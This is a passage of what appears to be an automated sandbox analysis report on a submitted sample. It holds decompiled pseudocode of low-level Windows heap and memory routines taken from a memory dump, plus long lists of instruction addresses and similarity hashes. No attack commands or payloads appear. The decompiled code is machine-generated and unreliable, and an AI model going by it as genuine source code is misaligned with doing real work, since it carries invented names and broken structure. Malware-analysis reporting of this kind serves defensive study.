																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                                                0x009ad5f2
                                                                                                                0x009ad5f5
                                                                                                                0x009ad5f5
                                                                                                                0x009ad5fd
                                                                                                                0x009ad600
                                                                                                                0x009ad60a
                                                                                                                0x009ad60d
                                                                                                                0x009ad617
                                                                                                                0x009ad61d
                                                                                                                0x009ad627
                                                                                                                0x009ad62e
                                                                                                                0x009ad911
                                                                                                                0x009ad913
                                                                                                                0x00000000
                                                                                                                0x009ad919
                                                                                                                0x009ad919
                                                                                                                0x009ad919
                                                                                                                0x009ad634
                                                                                                                0x009ad634
                                                                                                                0x009ad634
                                                                                                                0x009ad634
                                                                                                                0x009ad640
                                                                                                                0x009ad8bf
                                                                                                                0x00000000
                                                                                                                0x009ad646
                                                                                                                0x009ad646
                                                                                                                0x009ad64d
                                                                                                                0x009ad652
                                                                                                                0x009fb2fc
                                                                                                                0x009fb2fc
                                                                                                                0x009fb302
                                                                                                                0x009fb33b
                                                                                                                0x009fb341
                                                                                                                0x00000000
                                                                                                                0x009fb304
                                                                                                                0x009fb304
                                                                                                                0x009fb319
                                                                                                                0x009fb31e
                                                                                                                0x009fb324
                                                                                                                0x009fb326
                                                                                                                0x009fb332
                                                                                                                0x009fb347
                                                                                                                0x009fb34c
                                                                                                                0x009fb351
                                                                                                                0x009fb35a
                                                                                                                0x00000000
                                                                                                                0x009fb328
                                                                                                                0x009fb328
                                                                                                                0x00000000
                                                                                                                0x009fb328
                                                                                                                0x009fb326
                                                                                                                0x009ad658
                                                                                                                0x009ad658
                                                                                                                0x009ad65b
                                                                                                                0x009ad665
                                                                                                                0x00000000
                                                                                                                0x009ad66b
                                                                                                                0x009ad66b
                                                                                                                0x009ad66b
                                                                                                                0x009ad66b
                                                                                                                0x009ad66d
                                                                                                                0x009ad672
                                                                                                                0x009ad67a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ad680
                                                                                                                0x009ad686
                                                                                                                0x009ad8ce
                                                                                                                0x009ad8d4
                                                                                                                0x009ad8dd
                                                                                                                0x009ad8e0
                                                                                                                0x009ad68c
                                                                                                                0x009ad691
                                                                                                                0x009ad69d
                                                                                                                0x009ad6a2
                                                                                                                0x009ad6a7
                                                                                                                0x009ad6b0
                                                                                                                0x009ad6b5
                                                                                                                0x009ad6e0
                                                                                                                0x009ad6b7
                                                                                                                0x009ad6b7
                                                                                                                0x009ad6b9
                                                                                                                0x009ad6b9
                                                                                                                0x009ad6bb
                                                                                                                0x009ad6bd
                                                                                                                0x009ad6ce
                                                                                                                0x009ad6d0
                                                                                                                0x009ad6d2
                                                                                                                0x009fb363
                                                                                                                0x009fb365
                                                                                                                0x00000000
                                                                                                                0x009fb36b
                                                                                                                0x00000000
                                                                                                                0x009fb36b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ad6bf
                                                                                                                0x009ad6bf
                                                                                                                0x009ad6e5
                                                                                                                0x009ad6e7
                                                                                                                0x009ad6e9
                                                                                                                0x009ad6ec
                                                                                                                0x009ad6ec
                                                                                                                0x009ad6ef
                                                                                                                0x009ad6f5
                                                                                                                0x009ad6f9
                                                                                                                0x009ad6fb
                                                                                                                0x009ad6fd
                                                                                                                0x009ad701
                                                                                                                0x009ad703
                                                                                                                0x009ad70a
                                                                                                                0x009ad70a
                                                                                                                0x009ad701
                                                                                                                0x009ad710
                                                                                                                0x009ad710
                                                                                                                0x009ad6c1
                                                                                                                0x009ad6c1
                                                                                                                0x009ad6c6
                                                                                                                0x009fb36d
                                                                                                                0x009fb36f
                                                                                                                0x00000000
                                                                                                                0x009fb375
                                                                                                                0x009fb375
                                                                                                                0x009fb375
                                                                                                                0x00000000
                                                                                                                0x009fb375
                                                                                                                0x00000000
                                                                                                                0x009ad6cc
                                                                                                                0x009ad6d8
                                                                                                                0x009ad6d8
                                                                                                                0x009ad6d8
                                                                                                                0x00000000
                                                                                                                0x009ad6c6
                                                                                                                0x009ad6bf
                                                                                                                0x00000000
                                                                                                                0x009ad6da
                                                                                                                0x009ad6da
                                                                                                                0x009ad716
                                                                                                                0x009ad71b
                                                                                                                0x009ad720
                                                                                                                0x009ad726
                                                                                                                0x009ad726
                                                                                                                0x009ad72d
                                                                                                                0x00000000
                                                                                                                0x009ad733
                                                                                                                0x009ad739
                                                                                                                0x009ad742
                                                                                                                0x009ad750
                                                                                                                0x009ad758
                                                                                                                0x009ad764
                                                                                                                0x009ad776
                                                                                                                0x009ad77a
                                                                                                                0x009ad783
                                                                                                                0x009ad928
                                                                                                                0x009ad92c
                                                                                                                0x009ad93d
                                                                                                                0x009ad944
                                                                                                                0x009ad94f
                                                                                                                0x009ad954
                                                                                                                0x009ad956
                                                                                                                0x009ad95f
                                                                                                                0x009ad961
                                                                                                                0x009ad973
                                                                                                                0x009ad973
                                                                                                                0x009ad956
                                                                                                                0x009ad944
                                                                                                                0x009ad92c
                                                                                                                0x009ad78b
                                                                                                                0x009fb394
                                                                                                                0x009ad791
                                                                                                                0x009ad798
                                                                                                                0x009fb3a3
                                                                                                                0x009fb3bb
                                                                                                                0x009fb3bb
                                                                                                                0x009ad7a5
                                                                                                                0x009ad866
                                                                                                                0x009ad870
                                                                                                                0x009ad892
                                                                                                                0x009ad898
                                                                                                                0x009ad89e
                                                                                                                0x009ad8a0
                                                                                                                0x009ad8a6
                                                                                                                0x009ad8ac
                                                                                                                0x009ad8ae
                                                                                                                0x009ad8b4
                                                                                                                0x009ad8b4
                                                                                                                0x009ad8ae
                                                                                                                0x009ad7a5
                                                                                                                0x009ad78b
                                                                                                                0x009ad7b1
                                                                                                                0x009fb3c5
                                                                                                                0x009fb3c5
                                                                                                                0x009ad7c3
                                                                                                                0x009ad7ca
                                                                                                                0x009ad7e5
                                                                                                                0x009ad7eb
                                                                                                                0x009ad8eb
                                                                                                                0x009ad8ed
                                                                                                                0x00000000
                                                                                                                0x009ad8f3
                                                                                                                0x009ad8f3
                                                                                                                0x009ad8f3
                                                                                                                0x00000000
                                                                                                                0x009ad8ed
                                                                                                                0x009ad7cc
                                                                                                                0x009ad7cc
                                                                                                                0x009ad7d2
                                                                                                                0x00000000
                                                                                                                0x009ad7d4
                                                                                                                0x009ad7d4
                                                                                                                0x009ad7d7
                                                                                                                0x009ad7df
                                                                                                                0x009fb3d4
                                                                                                                0x009fb3d9
                                                                                                                0x009fb3dc
                                                                                                                0x009fb3dc
                                                                                                                0x009fb3df
                                                                                                                0x009fb3e2
                                                                                                                0x009fb468
                                                                                                                0x009fb46d
                                                                                                                0x009fb46f
                                                                                                                0x009fb46f
                                                                                                                0x009fb475
                                                                                                                0x009ad8f8
                                                                                                                0x009ad8f9
                                                                                                                0x009ad8fd
                                                                                                                0x009fb3e8
                                                                                                                0x009fb3e8
                                                                                                                0x009fb3eb
                                                                                                                0x009fb3ed
                                                                                                                0x00000000
                                                                                                                0x009fb3ef
                                                                                                                0x009fb3ef
                                                                                                                0x009fb3f1
                                                                                                                0x009fb3f4
                                                                                                                0x009fb3fe
                                                                                                                0x009fb404
                                                                                                                0x009fb409
                                                                                                                0x009fb40e
                                                                                                                0x009fb410
                                                                                                                0x009fb410
                                                                                                                0x009fb414
                                                                                                                0x009fb414
                                                                                                                0x009fb41b
                                                                                                                0x009fb420
                                                                                                                0x009fb423
                                                                                                                0x009fb425
                                                                                                                0x009fb427
                                                                                                                0x009fb42a
                                                                                                                0x009fb42d
                                                                                                                0x009fb42d
                                                                                                                0x009fb42a
                                                                                                                0x009fb432
                                                                                                                0x009fb436
                                                                                                                0x009fb438
                                                                                                                0x009fb43b
                                                                                                                0x009fb43b
                                                                                                                0x009fb449
                                                                                                                0x009fb44e
                                                                                                                0x009fb454
                                                                                                                0x009fb458
                                                                                                                0x009fb458
                                                                                                                0x009fb45d
                                                                                                                0x00000000
                                                                                                                0x009fb45d
                                                                                                                0x009fb3ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ad7df
                                                                                                                0x009ad7d2
                                                                                                                0x009ad7ca
                                                                                                                0x009fb37c
                                                                                                                0x009fb37e
                                                                                                                0x009fb385
                                                                                                                0x009fb38a
                                                                                                                0x00000000
                                                                                                                0x009fb38a
                                                                                                                0x009ad742
                                                                                                                0x009ad7f1
                                                                                                                0x009ad7f8
                                                                                                                0x009fb49b
                                                                                                                0x009fb49b
                                                                                                                0x009ad800
                                                                                                                0x009ad837
                                                                                                                0x009ad843
                                                                                                                0x009ad845
                                                                                                                0x009ad847
                                                                                                                0x009ad84a
                                                                                                                0x009ad84b
                                                                                                                0x009ad84e
                                                                                                                0x009ad857
                                                                                                                0x009ad818
                                                                                                                0x009ad824
                                                                                                                0x009ad831
                                                                                                                0x009fb4a5
                                                                                                                0x009fb4ab
                                                                                                                0x009fb4b3
                                                                                                                0x009fb4b8
                                                                                                                0x009fb4bb
                                                                                                                0x00000000
                                                                                                                0x009fb4c1
                                                                                                                0x009fb4c1
                                                                                                                0x009fb4c8
                                                                                                                0x00000000
                                                                                                                0x009fb4ce
                                                                                                                0x009fb4d4
                                                                                                                0x009fb4e1
                                                                                                                0x009fb4e3
                                                                                                                0x009fb4e5
                                                                                                                0x00000000
                                                                                                                0x009fb4eb
                                                                                                                0x009fb4f0
                                                                                                                0x009fb4f2
                                                                                                                0x009adac9
                                                                                                                0x009adacc
                                                                                                                0x009adacf
                                                                                                                0x009adad1
                                                                                                                0x009add78
                                                                                                                0x009add78
                                                                                                                0x009adcf2
                                                                                                                0x00000000
                                                                                                                0x009adad7
                                                                                                                0x009adad9
                                                                                                                0x009adadb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009adae1
                                                                                                                0x009adae1
                                                                                                                0x009adae4
                                                                                                                0x009adae6
                                                                                                                0x009fb4f9
                                                                                                                0x009fb4f9
                                                                                                                0x009fb500
                                                                                                                0x009adaec
                                                                                                                0x009adaec
                                                                                                                0x009adaf5
                                                                                                                0x009adaf8
                                                                                                                0x009adafb
                                                                                                                0x009adb03
                                                                                                                0x009adb11
                                                                                                                0x009adb16
                                                                                                                0x009adb19
                                                                                                                0x009adb1b
                                                                                                                0x009fb52c
                                                                                                                0x009fb531
                                                                                                                0x009fb534
                                                                                                                0x009adb21
                                                                                                                0x009adb21
                                                                                                                0x009adb24
                                                                                                                0x009adcd9
                                                                                                                0x009adce2
                                                                                                                0x009adce5
                                                                                                                0x009add6a
                                                                                                                0x009add6d
                                                                                                                0x00000000
                                                                                                                0x009add73
                                                                                                                0x009fb51a
                                                                                                                0x009fb51c
                                                                                                                0x009fb51f
                                                                                                                0x009fb524
                                                                                                                0x00000000
                                                                                                                0x009fb524
                                                                                                                0x009adce7
                                                                                                                0x009adce7
                                                                                                                0x009adce7
                                                                                                                0x00000000
                                                                                                                0x009adce7
                                                                                                                0x00000000
                                                                                                                0x009adb2a
                                                                                                                0x009adb2c
                                                                                                                0x009adb31
                                                                                                                0x009adb33
                                                                                                                0x009adb36
                                                                                                                0x009adb39
                                                                                                                0x009adb3b
                                                                                                                0x009adb66
                                                                                                                0x009adb66
                                                                                                                0x009adb3d
                                                                                                                0x009adb3d
                                                                                                                0x009adb3e
                                                                                                                0x009adb46
                                                                                                                0x009adb47
                                                                                                                0x009adb49
                                                                                                                0x009adb4c
                                                                                                                0x009adb53
                                                                                                                0x009adb55
                                                                                                                0x009adb58
                                                                                                                0x009adb5a
                                                                                                                0x009fb50a
                                                                                                                0x009fb50f
                                                                                                                0x009fb512
                                                                                                                0x009adb60
                                                                                                                0x009adb60
                                                                                                                0x009adb63
                                                                                                                0x009adb63
                                                                                                                0x00000000
                                                                                                                0x009adb63
                                                                                                                0x009adb5a
                                                                                                                0x009adb3b
                                                                                                                0x009adb24
                                                                                                                0x009adb69
                                                                                                                0x009adb69
                                                                                                                0x009adb6c
                                                                                                                0x009adb6f
                                                                                                                0x009adb74
                                                                                                                0x009fb557
                                                                                                                0x009fb557
                                                                                                                0x009fb55e
                                                                                                                0x009adb7a
                                                                                                                0x009adb7c
                                                                                                                0x009adb7f
                                                                                                                0x009adb82
                                                                                                                0x009adb85
                                                                                                                0x00000000
                                                                                                                0x009adb8b
                                                                                                                0x009adb8b
                                                                                                                0x009adb8d
                                                                                                                0x009adb9b
                                                                                                                0x009adb9b
                                                                                                                0x009adb9d
                                                                                                                0x009adba0
                                                                                                                0x009adba2
                                                                                                                0x009adba4
                                                                                                                0x009adba7
                                                                                                                0x009adba9
                                                                                                                0x009adbae
                                                                                                                0x009adbae
                                                                                                                0x009adbb1
                                                                                                                0x009adbb4
                                                                                                                0x009adbb4
                                                                                                                0x009adbb7
                                                                                                                0x009adbba
                                                                                                                0x009adcd2
                                                                                                                0x009adcd4
                                                                                                                0x00000000
                                                                                                                0x009adbc0
                                                                                                                0x009adbc0
                                                                                                                0x009adbd2
                                                                                                                0x009adbd7
                                                                                                                0x009adbda
                                                                                                                0x009adbdd
                                                                                                                0x009adbdf
                                                                                                                0x00000000
                                                                                                                0x009adbe5
                                                                                                                0x009adbe5
                                                                                                                0x009adbee
                                                                                                                0x009adbf1
                                                                                                                0x009fb541
                                                                                                                0x009fb544
                                                                                                                0x00000000
                                                                                                                0x009fb546
                                                                                                                0x009fb546
                                                                                                                0x00000000
                                                                                                                0x009fb546
                                                                                                                0x009adbf7
                                                                                                                0x009adbf7
                                                                                                                0x009adbfd
                                                                                                                0x009adbfd
                                                                                                                0x009adbff
                                                                                                                0x009adc0b
                                                                                                                0x009adc15
                                                                                                                0x009adc1b
                                                                                                                0x009adc1d
                                                                                                                0x009adc21
                                                                                                                0x009adc21
                                                                                                                0x009adc23
                                                                                                                0x009adc23
                                                                                                                0x009adc26
                                                                                                                0x009adc29
                                                                                                                0x009adc2b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009adc31
                                                                                                                0x009adc34
                                                                                                                0x009adc36
                                                                                                                0x009adcbf
                                                                                                                0x009adcbf
                                                                                                                0x009adcc2
                                                                                                                0x00000000
                                                                                                                0x009adc3c
                                                                                                                0x009adc41
                                                                                                                0x009adc43
                                                                                                                0x00000000
                                                                                                                0x009adc45
                                                                                                                0x009adc45
                                                                                                                0x009adc47
                                                                                                                0x00000000
                                                                                                                0x009adc4d
                                                                                                                0x009adc4d
                                                                                                                0x009adc50
                                                                                                                0x009adc52
                                                                                                                0x009adc55
                                                                                                                0x009adcfa
                                                                                                                0x009adcfe
                                                                                                                0x009add08
                                                                                                                0x009add0a
                                                                                                                0x009add0c
                                                                                                                0x00000000
                                                                                                                0x009add12
                                                                                                                0x009add15
                                                                                                                0x009add2d
                                                                                                                0x009add2f
                                                                                                                0x009add32
                                                                                                                0x009add35
                                                                                                                0x00000000
                                                                                                                0x009add35
                                                                                                                0x009adc5b
                                                                                                                0x009adc5b
                                                                                                                0x009adc5e
                                                                                                                0x009adc61
                                                                                                                0x009adc64
                                                                                                                0x009adc67
                                                                                                                0x009adc67
                                                                                                                0x009adc6a
                                                                                                                0x009adc6c
                                                                                                                0x009adc8e
                                                                                                                0x009adc8e
                                                                                                                0x009adc91
                                                                                                                0x009adc93
                                                                                                                0x009adcce
                                                                                                                0x009adcce
                                                                                                                0x009adc95
                                                                                                                0x009adc9c
                                                                                                                0x009adc6e
                                                                                                                0x009adc72
                                                                                                                0x009adc75
                                                                                                                0x009adc77
                                                                                                                0x009adc79
                                                                                                                0x009fb551
                                                                                                                0x009fb551
                                                                                                                0x00000000
                                                                                                                0x009adc7f
                                                                                                                0x009adc7f
                                                                                                                0x009adc81
                                                                                                                0x00000000
                                                                                                                0x009adc83
                                                                                                                0x009adc86
                                                                                                                0x009adc88
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009adc88
                                                                                                                0x009adc81
                                                                                                                0x009adc79
                                                                                                                0x009adc6c
                                                                                                                0x009adc55
                                                                                                                0x009adc47
                                                                                                                0x009adc43
                                                                                                                0x00000000
                                                                                                                0x009adc36
                                                                                                                0x009adc23
                                                                                                                0x00000000
                                                                                                                0x009adbff
                                                                                                                0x009adbf1
                                                                                                                0x009adbdf
                                                                                                                0x009adb8f
                                                                                                                0x009adb92
                                                                                                                0x009adb95
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009adb95
                                                                                                                0x009adb8d
                                                                                                                0x009adb85
                                                                                                                0x009adb74
                                                                                                                0x009adc9f
                                                                                                                0x009adca2
                                                                                                                0x009adcb0
                                                                                                                0x009adcb0
                                                                                                                0x009adad1
                                                                                                                0x009fb4e5
                                                                                                                0x009fb4c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009ad831
                                                                                                                0x00000000
                                                                                                                0x009ad800
                                                                                                                0x009fb47f
                                                                                                                0x009fb485
                                                                                                                0x00000000
                                                                                                                0x009fb485
                                                                                                                0x009ad665
                                                                                                                0x009ad652
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (/S$8*S
                                                                                                                • API String ID: 0-1884744282
                                                                                                                • Opcode ID: 09a05a57c6137dfc132a2deff067b07c34bc1bafb38f5c61eb141942e8fea917
                                                                                                                • Instruction ID: f9d5723207c142f59d066a1d6ff72d54a6cab778610fceb2108b7cfd7c1d2845
                                                                                                                • Opcode Fuzzy Hash: 09a05a57c6137dfc132a2deff067b07c34bc1bafb38f5c61eb141942e8fea917
                                                                                                                • Instruction Fuzzy Hash: BFE11770A02319CFDB34DF18C984BB9B7B6BF86304F1441A9E90A97691DB749D81CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A5E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E00A5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00A5BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00A5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00A5AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E009D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00A5A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00A5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E009D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00A5A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00A5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E009B2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E009AB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E009AFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E009B7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00A4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                0x00a5e547
                                                                                                                0x00a5e549
                                                                                                                0x00a5e54f
                                                                                                                0x00a5e553
                                                                                                                0x00a5e557
                                                                                                                0x00a5e55a
                                                                                                                0x00a5e55c
                                                                                                                0x00a5e55f
                                                                                                                0x00a5e561
                                                                                                                0x00a5e567
                                                                                                                0x00a5e56b
                                                                                                                0x00a5e7e2
                                                                                                                0x00000000
                                                                                                                0x00a5e571
                                                                                                                0x00a5e575
                                                                                                                0x00a5e577
                                                                                                                0x00a5e57b
                                                                                                                0x00a5e57c
                                                                                                                0x00a5e57d
                                                                                                                0x00a5e57e
                                                                                                                0x00a5e57f
                                                                                                                0x00a5e588
                                                                                                                0x00a5e58f
                                                                                                                0x00a5e591
                                                                                                                0x00a5e592
                                                                                                                0x00a5e592
                                                                                                                0x00a5e596
                                                                                                                0x00a5e59e
                                                                                                                0x00a5e5a0
                                                                                                                0x00a5e5a6
                                                                                                                0x00a5e61d
                                                                                                                0x00a5e61d
                                                                                                                0x00a5e621
                                                                                                                0x00a5e623
                                                                                                                0x00a5e630
                                                                                                                0x00a5e630
                                                                                                                0x00a5e7e6
                                                                                                                0x00a5e7eb
                                                                                                                0x00a5e7ed
                                                                                                                0x00a5e7f4
                                                                                                                0x00a5e7fa
                                                                                                                0x00a5e7ff
                                                                                                                0x00a5e7ff
                                                                                                                0x00a5e80a
                                                                                                                0x00a5e812
                                                                                                                0x00a5e812
                                                                                                                0x00a5e5ab
                                                                                                                0x00a5e5b4
                                                                                                                0x00a5e5b9
                                                                                                                0x00a5e5be
                                                                                                                0x00a5e5c0
                                                                                                                0x00a5e5c2
                                                                                                                0x00a5e5c8
                                                                                                                0x00a5e5c9
                                                                                                                0x00a5e5cb
                                                                                                                0x00a5e5cc
                                                                                                                0x00a5e5d5
                                                                                                                0x00a5e5e4
                                                                                                                0x00a5e5f1
                                                                                                                0x00a5e5f8
                                                                                                                0x00a5e5f8
                                                                                                                0x00a5e5d5
                                                                                                                0x00a5e602
                                                                                                                0x00a5e616
                                                                                                                0x00a5e63d
                                                                                                                0x00a5e644
                                                                                                                0x00a5e64d
                                                                                                                0x00a5e652
                                                                                                                0x00a5e657
                                                                                                                0x00a5e659
                                                                                                                0x00a5e65b
                                                                                                                0x00a5e661
                                                                                                                0x00a5e662
                                                                                                                0x00a5e664
                                                                                                                0x00a5e665
                                                                                                                0x00a5e66e
                                                                                                                0x00a5e67d
                                                                                                                0x00a5e68a
                                                                                                                0x00a5e691
                                                                                                                0x00a5e691
                                                                                                                0x00a5e66e
                                                                                                                0x00a5e6b0
                                                                                                                0x00000000
                                                                                                                0x00a5e6b6
                                                                                                                0x00a5e6bd
                                                                                                                0x00a5e6c7
                                                                                                                0x00a5e6d7
                                                                                                                0x00a5e6d9
                                                                                                                0x00a5e6db
                                                                                                                0x00a5e6de
                                                                                                                0x00a5e6e3
                                                                                                                0x00a5e6f3
                                                                                                                0x00a5e6fc
                                                                                                                0x00a5e700
                                                                                                                0x00a5e700
                                                                                                                0x00a5e704
                                                                                                                0x00a5e70a
                                                                                                                0x00a5e70a
                                                                                                                0x00a5e713
                                                                                                                0x00a5e716
                                                                                                                0x00a5e719
                                                                                                                0x00a5e720
                                                                                                                0x00a5e761
                                                                                                                0x00a5e76b
                                                                                                                0x00a5e774
                                                                                                                0x00a5e77a
                                                                                                                0x00a5e77a
                                                                                                                0x00a5e78a
                                                                                                                0x00a5e791
                                                                                                                0x00a5e799
                                                                                                                0x00a5e79b
                                                                                                                0x00a5e79f
                                                                                                                0x00a5e7aa
                                                                                                                0x00a5e7c0
                                                                                                                0x00a5e7ac
                                                                                                                0x00a5e7b2
                                                                                                                0x00a5e7b9
                                                                                                                0x00a5e7b9
                                                                                                                0x00a5e7c7
                                                                                                                0x00a5e806
                                                                                                                0x00000000
                                                                                                                0x00a5e7c9
                                                                                                                0x00a5e7d1
                                                                                                                0x00a5e7d8
                                                                                                                0x00000000
                                                                                                                0x00a5e7d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a5e722
                                                                                                                0x00a5e72e
                                                                                                                0x00a5e748
                                                                                                                0x00a5e74c
                                                                                                                0x00a5e754
                                                                                                                0x00a5e756
                                                                                                                0x00a5e75c
                                                                                                                0x00a5e75c
                                                                                                                0x00000000
                                                                                                                0x00a5e75c
                                                                                                                0x00a5e758
                                                                                                                0x00a5e758
                                                                                                                0x00000000
                                                                                                                0x00a5e758
                                                                                                                0x00a5e750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a5e752
                                                                                                                0x00000000
                                                                                                                0x00a5e752
                                                                                                                0x00a5e730
                                                                                                                0x00a5e735
                                                                                                                0x00a5e73d
                                                                                                                0x00a5e73f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a5e741
                                                                                                                0x00a5e741
                                                                                                                0x00000000
                                                                                                                0x00a5e741
                                                                                                                0x00a5e739
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a5e73b
                                                                                                                0x00000000
                                                                                                                0x00a5e73b
                                                                                                                0x00a5e722
                                                                                                                0x00a5e720
                                                                                                                0x00a5e6b0
                                                                                                                0x00a5e618
                                                                                                                0x00000000
                                                                                                                0x00a5e618

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
